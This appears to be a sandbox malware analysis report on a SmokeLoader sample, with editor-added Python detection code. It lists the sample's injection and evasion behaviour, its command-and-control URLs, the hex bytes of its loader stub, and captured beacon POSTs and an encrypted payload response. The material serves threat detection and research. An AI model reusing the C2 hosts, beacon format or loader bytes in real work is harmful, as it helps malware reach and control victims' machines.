Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 756298
MD5: f39dbbcdcaac9c8d2039b855c752c214
SHA1: ab36da0a55feab685587c52bce5268fca7ef0e23
SHA256: 12675d0f7c4a8d729eda453ad01697b0790f2921258e9befc54cf9327156aa10
Tags: exe

Detection

SmokeLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Writes to foreign memory regions
Checks if browser processes are running
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains functionality to compare user and computer (likely to detect sandboxes)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • file.exe (PID: 6100 cmdline: C:\Users\user\Desktop\file.exe MD5: F39DBBCDCAAC9C8D2039B855C752C214)
    • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 4452 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 1836 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 4584 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 3852 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 2088 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 4800 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 1776 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 2464 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • jdggfai (PID: 5952 cmdline: C:\Users\user\AppData\Roaming\jdggfai MD5: F39DBBCDCAAC9C8D2039B855C752C214)
Malware Configuration

SmokeLoader: {"C2 list": ["http://s2scomm20.com/", "http://c2csosi228d.com/", "http://xdd42sdfsdf.com/"]}
Yara matches (memory dumps)

Source | Rule | Description | Author | Strings
00000009.00000002.407040058.0000000000748000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x4a28:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |
00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x374:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
(21 further entries in the full report)

Yara matches (unpacked PEs)

Source | Rule | Description | Author | Strings
9.2.jdggfai.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
9.3.jdggfai.6f0000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
0.2.file.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
0.3.file.exe.5e0000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
0.2.file.exe.5d0e67.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
(1 further entry in the full report)
                No Sigma rule has matched
                No Snort rule has matched
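The following is an added example written for this page, not code from the Joe Sandbox report: a small scanner that takes the two Yara hex strings listed in the tables above, compiles them the way Yara reads hex strings (two-digit bytes, `??` as a one-byte wildcard), and runs them over a constructed memory-dump buffer in which the SmokeLoader stub is placed at offset 0x34, the offset the report gives for the 0000000C.00000000.411589845... dump. The instruction-by-instruction annotation of the stub is the editor's reading of those bytes (a 32-bit PEB/Ldr walk that ends with the ntdll.dll image base), not something the report states; the rule-name keys and the filler bytes around the stub are assumptions.

```python
"""Added example (not part of the Joe Sandbox report): a minimal Yara-style
hex-string scanner run over a constructed memory-dump buffer, using the two
hex strings the report's Yara hits list, plus an annotation of what the
SmokeLoader stub does."""
import re

# Hex strings copied from the report's "Strings" column ($a of each rule).
YARA_STRINGS = {
    "Windows_Trojan_Smokeloader_4e31426e:$a":
        "5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0",
    "Windows_Trojan_RedLineStealer_ed346e4c:$a":
        "55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B",
}

# Editor's reading of the SmokeLoader stub (32-bit; offsets follow the
# documented PEB / PEB_LDR_DATA layout). The last instruction is cut off in
# the Yara string exactly as in the report.
SMOKELOADER_STUB = [
    ("5B",                "pop ebx",             "return address pushed by the call that reached this code"),
    ("81 EB 34 10 00 00", "sub ebx, 0x1034",     "rebase ebx to the start of the injected code"),
    ("6A 30 58",          "push 0x30; pop eax",  "eax = 0x30 without an immediate mov"),
    ("64 8B 00",          "mov eax, fs:[eax]",   "TEB+0x30 -> PEB"),
    ("8B 40 0C",          "mov eax, [eax+0x0C]", "PEB.Ldr"),
    ("8B 40 1C",          "mov eax, [eax+0x1C]", "Ldr.InInitializationOrderModuleList.Flink"),
    ("8B 40 08",          "mov eax, [eax+0x08]", "DllBase of the first entry (ntdll.dll)"),
    ("89 85 C0",          "mov [ebp-...], eax",  "stash the ntdll base in a local (disp32 truncated)"),
]


def hex_pattern_to_regex(pattern: str) -> re.Pattern:
    """Compile a Yara-style hex string into a bytes regex.
    Each token is a two-digit hex byte or the single-byte wildcard '??'."""
    parts = []
    for tok in pattern.split():
        if tok == "??":
            parts.append(b".")
        elif re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            parts.append(re.escape(bytes([int(tok, 16)])))
        else:
            raise ValueError(f"unsupported hex token {tok!r}")
    return re.compile(b"".join(parts), re.DOTALL)


def scan(buf: bytes, patterns: dict = YARA_STRINGS) -> dict:
    """Return {rule_string: [offsets]} for every pattern that occurs in buf."""
    hits = {}
    for name, pat in patterns.items():
        offsets = [m.start() for m in hex_pattern_to_regex(pat).finditer(buf)]
        if offsets:
            hits[name] = offsets
    return hits


def stub_bytes() -> bytes:
    """Reassemble the stub from the annotated rows. It equals the report's $a
    string, which pins the annotation to the real bytes."""
    return bytes.fromhex("".join(row[0] for row in SMOKELOADER_STUB))


# Constructed dump: the stub at 0x34 (the report's offset for the
# 0000000C.00000000.411589845... dump) inside arbitrary filler bytes.
SAMPLE_DUMP = b"\x00" * 0x34 + stub_bytes() + b"\xCC" * 32 + b"\x90" * 16

if __name__ == "__main__":
    for rule, offs in scan(SAMPLE_DUMP).items():
        print(rule, [hex(o) for o in offs])
    for raw, asm, meaning in SMOKELOADER_STUB:
        print(f"{raw:<20} {asm:<22} ; {meaning}")
```

Because the match lands in process memory dumps rather than in the file on disk, a rule built from this string belongs in a memory scanner (or a sandbox's dump stage), not in a gateway file filter: the stub only exists after unpacking.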


                AV Detection

Source: file.exe | Virustotal: Detection: 33%
Source: http://c2csosi228d.com/ | Avira URL Cloud: Label: malware
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jdggfai | Joe Sandbox ML: detected
Source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://s2scomm20.com/", "http://c2csosi228d.com/", "http://xdd42sdfsdf.com/"]}

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE1765 lstrlen,CryptBinaryToStringA,CryptBinaryToStringA
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_009D245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_009D2404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_009D263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A126D CryptBinaryToStringA,CryptBinaryToStringA
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_007D25A4 CryptBinaryToStringA,CryptBinaryToStringA
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_007D2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_00571314 lstrlen,CryptBinaryToStringA,CryptBinaryToStringA

Uses 32bit PE files

Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Tries to load missing DLLs

Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Debug symbol (PDB) path strings

Source: Binary string: C:\cas-rih_casur\velinimuc luzotumez14.pdb | source: file.exe, jdggfai.1.dr
Source: Binary string: bC:\cas-rih_casur\velinimuc luzotumez14.pdb0f | source: file.exe, jdggfai.1.dr

File and directory enumeration code (FindFirstFileW / FindNextFileW)

Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE14D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE13FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE15BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A1939 wsprintfW,FindFirstFileW,lstrcmpiW,wsprintfW,wsprintfW,wsprintfW,RtlZeroMemory,lstrcat,StrToIntA,PathMatchSpecW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A1936 wsprintfW,FindFirstFileW,lstrcmpiW,wsprintfW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A217C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A1FFD FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_003A1B5B GetTempPathW,lstrcatW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,wsprintfW,CreateFileW,GetFileSize,ReadFile,CloseHandle,DeleteFileW

                Networking

Source: C:\Windows\explorer.exe | Domain query: r3oidsofsios.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor | URLs: http://s2scomm20.com/
Source: Malware configuration extractor | URLs: http://c2csosi228d.com/
Source: Malware configuration extractor | URLs: http://xdd42sdfsdf.com/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View | ASN Name: LVLT-10753US

IP address seen in connection with other malware

Source: Joe Sandbox View | IP Address: 185.246.221.151
Uses a known web browser user agent for HTTP communication

Source: global traffic | HTTP traffic detected: 29 requests to r3oidsofsios.com, all of the same shape; only the Referer and Content-Length change between them:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: (varies, see below)
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: (varies, see below)
  Host: r3oidsofsios.com

  Referer                   Content-Length
  http://kqgkblakc.com/     323
  http://ryjwkat.net/       311
  http://ewfonmrybp.org/    137
  http://hraesy.net/        179
  http://vqnwxa.org/        307
  http://sqyiaue.net/       288
  http://cygghp.com/        217
  http://dtxwodx.net/       127
  http://wypuksbjb.org/     177
  http://qgjuekrsef.net/    294
  http://rlovsbdvn.net/     350
  http://ugjjaam.net/       123
  http://poflgkd.org/       317
  http://vshacsl.org/       190
  http://kabjenh.com/       227
  http://vyukg.com/         329
  http://xnfwjbsuvp.com/    288
  http://nvftibg.com/       185
  http://okade.org/         252
  http://iungf.org/         300
  http://bhqtkqlvvb.org/    218
  http://whvkq.com/         254
  http://rspyhp.net/        161
  http://jvjyarecuw.net/    298
  http://hrxqxa.net/        253
  http://uwoxt.net/         363
  http://bqruytosp.com/     285
  http://lclth.com/         257
  http://vreqndf.com/       261
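The request shape above (a burst of POST / to one Host, a Referer that changes on every request and names a domain the sandbox never resolved, an Internet Explorer User-Agent sent by explorer.exe rather than a browser) is what a network detection should key on. The following is an added example written for this page, not code from the report or from Joe Sandbox: it groups request records by Host and scores each host on those properties. The Referer and Content-Length values come from the table above; the record format, the control traffic to example.org, the set of resolved domains, the browser-process list and the thresholds are constructed assumptions.

```python
"""Added example (not part of the Joe Sandbox report): flag a host that
receives a burst of POST / requests whose Referer rotates through domains
that were never resolved, from a process that is not a browser."""
from collections import defaultdict
from urllib.parse import urlparse

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"

# Processes that legitimately send a browser User-Agent (assumed list).
BROWSER_PROCESSES = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}


def _req(proc, host, referer, clen, method="POST", path="/", ua=IE11_UA):
    """One request record; the field set mirrors the report's HTTP lines."""
    return {"proc": proc, "method": method, "path": path, "host": host,
            "referer": referer, "content_length": clen, "ua": ua}


# Constructed records: six of the report's beacons (Referer and Content-Length
# from the table above) plus benign browser traffic to example.org as a control.
SAMPLE_REQUESTS = [
    _req("explorer.exe", "r3oidsofsios.com", "http://kqgkblakc.com/", 323),
    _req("explorer.exe", "r3oidsofsios.com", "http://ryjwkat.net/", 311),
    _req("explorer.exe", "r3oidsofsios.com", "http://ewfonmrybp.org/", 137),
    _req("explorer.exe", "r3oidsofsios.com", "http://hraesy.net/", 179),
    _req("explorer.exe", "r3oidsofsios.com", "http://vqnwxa.org/", 307),
    _req("explorer.exe", "r3oidsofsios.com", "http://sqyiaue.net/", 288),
    _req("iexplore.exe", "example.org", "http://example.org/", 0, "GET", "/index.html"),
    _req("iexplore.exe", "example.org", "http://example.org/index.html", 88, "POST", "/login"),
    _req("iexplore.exe", "example.org", "http://example.org/index.html", 91, "POST", "/"),
]

# Domains that were actually looked up. The report records a DNS query only for
# r3oidsofsios.com; example.org is added for the constructed control traffic.
RESOLVED_DOMAINS = {"r3oidsofsios.com", "example.org"}


def beacon_findings(requests, resolved=RESOLVED_DOMAINS, min_posts=5, min_referers=5):
    """Group requests by Host and return one finding per host that shows the
    pattern. The thresholds are assumptions; tune them to the environment."""
    by_host = defaultdict(list)
    for r in requests:
        by_host[r["host"]].append(r)
    findings = []
    for host, reqs in by_host.items():
        root_posts = [r for r in reqs if r["method"] == "POST" and r["path"] == "/"]
        referers = {urlparse(r["referer"]).hostname for r in root_posts if r["referer"]}
        referers.discard(host)  # a same-site Referer is normal and not counted
        unresolved = {d for d in referers if d not in resolved}
        non_browser = sorted({r["proc"] for r in reqs
                              if "Mozilla/" in r["ua"]
                              and r["proc"].lower() not in BROWSER_PROCESSES})
        if len(root_posts) >= min_posts and len(referers) >= min_referers:
            findings.append({
                "host": host,
                "root_posts": len(root_posts),
                "distinct_foreign_referers": len(referers),
                "unresolved_referers": len(unresolved),
                "non_browser_processes": non_browser,
                "body_sizes": sorted(r["content_length"] for r in root_posts),
            })
    return findings


if __name__ == "__main__":
    for finding in beacon_findings(SAMPLE_REQUESTS):
        print(finding)
```

The unresolved-Referer count is the strongest of the three signals: a real browser only sends a Referer for a page it has loaded, so a Referer domain that never appears in DNS telemetry cannot have come from navigation. Run against the full 29-request set above, the host scores 29 root POSTs with 29 distinct, unresolved Referer domains.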
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 29 Nov 2022 23:12:31 GMT | Server: Apache/2.4.41 (Ubuntu) | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html; charset=utf-8 | Data Raw: 32 37 34 66 65 0d 0a 2f 00 00 00 8f 3b 41 39 46 2c cf 62 b4 69 4c 7a ea be ee 06 5f 4c ee 8e a8 e1 af 06 13 a0 cc 71 e9 ea 11 2f 96 e3 88 cb 32 b7 9a 95 e1 3c f7 13 c7 f8 58 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63
The first seven bytes of the body are the chunk-size line "274fe\r\n" (0x274fe = 161022 bytes of chunk data); what follows is binary, not the HTML that the Content-Type header declares. This response differs from the plain Apache error pages below only in its body, so the 404 status is cosmetic.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 29 Nov 2022 23:12:34 GMT | Server: Apache/2.4.41 (Ubuntu) | Content-Length: 404 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
Source: global traffic | HTTP traffic detected: six further 404 responses (Date: 23:12:35, 23:12:35, 23:12:37, 23:12:37, 23:12:37 and 23:12:38 GMT) identical to the one above apart from the Date header.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:38 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:38 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was 